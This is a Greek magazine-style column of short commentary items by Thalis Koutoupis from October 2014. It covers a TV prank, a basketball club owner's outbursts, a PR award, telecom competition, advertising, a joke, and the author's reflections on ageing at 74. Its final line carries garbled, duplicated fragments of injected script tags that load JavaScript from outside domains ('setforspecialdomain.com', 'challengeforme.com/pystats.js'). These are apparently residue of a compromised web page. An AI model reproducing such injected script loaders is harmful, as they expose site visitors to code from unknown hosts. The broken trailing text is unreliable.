Αμάν (πια με την )Αλαμουντίν! Του Θαλή Κουτούπη

0046-682x1024

ΚΑΚΟΓΟΥΣΤΑ, ΕΠΙΚΙΝΔΥΝΑ ΚΑΙ ΑΝΤΙΚΟΙΝΩΝΙΚΑ ΑΣΤΕΙΑ
Όπως είχα προβλέψει, ο Μάρκος Σεφερλής ξεκίνησε με μια… ξεκαρδιστική φάρσα τις εκπομπές του στο MEGA. Τρομοκράτησε κυριολεκτικά μια κυρία, στην οποία είπε ότι ήταν απ’ την πολεοδομία κι ότι έχει ληφθεί απόφαση για την απαλλοτρίωση του σπιτιού της! Χαριτωμένο, ε; Πρώτοι διδάξαντες ραδιοφωνικά αυτών των κακόγουστων, αντικοινωνικών και επικίνδυνων «αστείων» ήταν τα «Κακά παιδιά», Λάμπης Ταγματάρχης και Θανάσης Λάλας, που έκαναν καριέρα χάρη σ’ αυτή την εκπομπή! Κι αν η κυρία αυτή, αγαπητέ Μάρκο πάθαινε έμφραγμα; Το ΕΣΡ κι η Εισαγγελία, τι κάνουν; Ή μήπως θ’ ακούσουμε κραυγές για την ελευθερία της καλλιτεχνικής έκφρασης; Θυμίζω ότι μετά από παρεμφερές τηλεοπτικό ατόπημα της κ. Ράγιου, είχε αυτοκτονήσει το «θύμα» της!

ΣΥΜΒΟΥΛΟ ΕΠΕΙΓΟΝΤΩΣ!
Σύμβουλο Δημοσίων Σχέσεων και Επικοινωνίας χρειάζεται επειγόντως ο κ. Δημήτρης Γιαννακόπουλος, ο οποίος κατεδαφίζει με τις ασύντακτες, αγενείς, προκλητικές και υβριστικές δηλώσεις του, ό,τι με ιδρώτα χτίζουν στο γήπεδο παίκτες και προπονητής της ομάδας μπάσκετ του Παναθηναϊκού! Ο πατέρας του κι ο θείος του συνεχώς αγωνίζονταν σκληρά για την «προστασία» της ομάδας μπάσκετ του ΠΑΟ, αλλά ποτέ δεν πρόσβαλαν την ομάδα τους, τους αντιπάλους, τις αρμόδιες αρχές και τον κόσμο του Παναθηναϊκού. Ο Παύλος κι ο Θανάσης Γιαννακόπουλος, ας μαζέψουν τον αψίκορο και αγενή «Δημητράκη», που προσβάλλει πριν από όλους, τον μεγάλο ΠΑΟ, που έχτισαν εκείνοι, πριν κάνει μεγαλύτερη ζημιά!

ΧΡΥΣΟ ΒΡΑΒΕΙΟ ΓΙΑ ΤΗΝ V&O
Η V+O Communication και η Unlimited Creativity απέσπασαν το χρυσό βραβείο στην κατηγορία «Internal Communications» στα IPRA Golden World Awards, στα βραβεία PR που διοργανώνονται από τη Διεθνή Ένωση Δημοσίων Σχέσεων (IPRA). Οι δύο εταιρείες έλαβαν το βραβείο για την καμπάνια εσωτερικής επικοινωνίας «Return to Growth» της AstraZeneca, η οποία είχε στόχο την μετάδοση της εταιρικής κουλτούρας και της φιλοσοφίας εσωτερικής διακυβέρνησης στους εργαζόμενους της εταιρείας.
Η V&O αποτελεί μια απ’ τις κορυφαίες εταιρίες επικοινωνίας στην Ελλάδα, με αφοσίωση στην ποιότητα και συνεπή επαγγελματισμό.
Με χαρά και ικανοποίηση βλέπω να αυξάνονται –συγκριτικά με παλιότερες εποχές- τα χρυσά και αργυρά βραβεία, που αποσπούν ελληνικές εταιρίες επικοινωνίας.

ΣΚΛΗΡΟΣ ΑΝΤΑΓΩΝΙΣΜΟΣ,
ΜΕ ΩΦΕΛΕΙΑ ΤΟΥ ΚΑΤΑΝΑΛΩΤΗ
Λυσσαλέα είναι η μάχη κι ο καλώς εννοούμενος ανταγωνισμός, ανάμεσα στον ΟΤΕ. τη VODAFONE, τη NOVA, τη WIND, τη FORTHNET και τη CYTA, σε όλα τα επίπεδα, σταθερών, κινητών, διαδικτύου και καλωδιακής. Μάχη, η οποία ανεξάρτητα απ’ τον τελικό νικητή είναι οπωσδήποτε υπέρ του καταναλωτή! Η δραματική πτώση του κόστους του καταναλωτή για τη χρησιμοποίηση αυτών των διαύλων (πάμπολλοι, μεταξύ των οποίων κι εγώ) χρησιμοποιούν πλέον ΔΩΡΕΑΝ σταθερή τηλεφωνία και με πολύ χαμηλό κόστος, το διαδίκτυο και τις καλωδιακές συνδέσεις. Αυτό το παράδειγμα είναι το ισχυρότερο και αδιάσειστο επιχείρημα, εναντίον όσων βυσσοδομούν εναντίον της «ελεύθερης αγοράς» και θέλουν να την υποτάξουν στις κρατικές αλυσίδες!

Η ΔΗΜΙΟΥΡΓΙΚΟΤΗΤΑ
ΑΙ ΟΙ ΠΩΛΗΣΕΙΣ
«Αν δεν πουλάει δεν είναι δημιουργικό»! David Ogilvy.
Αλλά κι ό,τι είναι «δημιουργικό» δεν πουλάει απαραίτητα, θα συμπλήρωνα εγώ με συστολή τον μεγάλο αυτόν δημιουργό! Οι έλληνες δημιουργικοί συχνά μπερδεύουν διαχρονικά τις προτεραιότητες, βάζοντας ως πρώτο στόχο τον «δημιουργικό εντυπωσιασμό» και μετά τη δυναμική της πώλησης! Μακάριοι, αυτοί που πετυχαίνουν και τους δυο στόχους. Αλλά αν τυχόν δεν είσαι προικισμένος δημιουργικός, φτάνει και περισσεύει τον πελάτη να πουλάς το προϊόν του!

ΕΝΑ ΧΑΜΟΓΕΛΟ
-Μπαμπά, στο σχολείο με φωνάζουν μαφιόζο.
-Καλά, θα περάσω να το κανονίσω.
-Ωραία, αλλά φρόντισε να φανεί ατύχημα, ε;

ΜΑΜΑ ΓΕΡΝΑΩ!
«Μαμά γερνάω»… Ή μήπως γέρασα ήδη;
Αντιστέκομαι σθεναρά στα 74 μου και μετά από μισό αιώνα σκληρής δουλειάς στις αρτηριοσκληρώσεις και αγκυλώσεις της ηλικίας μου. Βασικά όπλα μου η συνεχής επαφή με νέους ανθρώπους και με ανοιχτά τ’ αυτιά μου, η διαρκής ενημέρωσή μου και η χρήση του διαδικτύου σε πολύ ικανοποιητικό βαθμό. Και τολμώ να πω ότι το μυαλό μου βρίσκεται στην καλύτερη συγκριτικά κατάσταση από όλα τα όργανα και τα μέλη μου, διατηρείται πολύ ενεργό και συχνά γεννάει φρέσκες ιδέες. Παρ’ όλα αυτά, τα νομοτελειακά σημάδια της γήρανσης είναι παρόντα, σε αρκετά επίπεδα, όπως π.χ. στη σωματική κόπωση, στις ποικίλες παθήσεις του οργανισμού μου, στην αύξηση των οχλήσεων από το κοινωνικό περιβάλλον μου, στα 11-15 χάπια, σπρέι κι αλοιφές, που πρέπει να παίρνω κάθε μέρα, για να διατηρώ τον οργανισμό μου σε καλή λειτουργία κ.λπ. Μαζί μ’ αυτά έχει έρθει ευτυχώς και μια ακόμη μεγαλύτερη απ’ αυτή που πάντα είχα επιείκεια για τους συνανθρώπους μου, μειωμένος εγωισμός, συχνότερη αποδοχή συμβιβασμών με ό,τι δεν μού αρέσει και σίγουρα περισσότερη σύνεση!

ΚΑΝΑΛΙΚΟ ΑΛΙΣΒΕΡΙΣΙ
Κόσμος πάει κι έρχεται στα κανάλια! Παρατηρείται μια μεγάλη κινητικότητα, μεγάλων και μικρών «τηλαστέρων» από καναλιού εις κανάλι –-για πρώτη φορά σε τόσο μεγάλο βαθμό- ακριβώς εξ αιτίας του αυξημένου ανταγωνισμού της πληθώρας των καναλιών, όλων σχεδόν ζημιογόνων.

Αυτά τα σχόλια γράφηκαν
5-20 Οκτωβρίου 2014___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>